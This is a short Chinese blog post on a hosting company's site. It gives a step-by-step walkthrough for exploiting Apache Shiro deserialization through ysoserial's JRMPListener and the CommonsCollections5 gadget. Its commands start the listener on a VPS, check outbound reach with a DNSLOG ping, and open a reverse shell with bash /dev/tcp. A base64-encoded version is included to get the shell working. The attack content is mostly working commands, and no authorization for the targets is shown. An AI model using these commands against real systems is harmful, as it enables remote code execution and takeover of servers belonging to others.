行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
shiro反序列漏洞中JRMPClient利用
2022-12-01 12:12:42 【

最近在测试中遇到一些shiro反序列化不能利用的情况 找到key 无法找到利用链,但是发现存在JRMPClient可用的情况

换一种工具尝试

发现 JRMPClient 可用, 尝试使用 JRMPClient 进行测试,最终这个目标也没有执行成功所以换了一个目标进行的尝试,仅记录JRMPClient 利用方式。

使用JRMPClient模块进行测试

找到一个同样存在shiro反序列的目标。

同样find: JRMPClient can be use。

搭建JRMPClient 监听服务

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服务,下载地址:http://github.com/frohoff/ysoserial

使用DNSLOG进行检测

在不确定目标是否通外网的情况下 先使用DNSLOG进行检测 获取一个新的域名 :w3dh1h.dnslog.cn

VPS上开启JRMPListener

在VPS上搭建服务命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

shiro反序列利用工具中选择JRMPClient,然后输入VPS上搭建服务的地址:

JRMPListener 收到返回信息

DNSLOG上收到目标的ping 命令信息 说明目标服务器通外网

执行反弹命令

执行反弹命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

没有收到反弹链接

将命令进行base64编码 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

成功收到反弹链接


】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇服务器安全对象范围包括? 下一篇阻止网络钓鱼攻击的三种方法

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:010-56157787 ,010-56159998
企业QQ:4000043998
技术支持:010-56159998
E-Mail:800@fangyuba.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:4000043998 01056155355
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800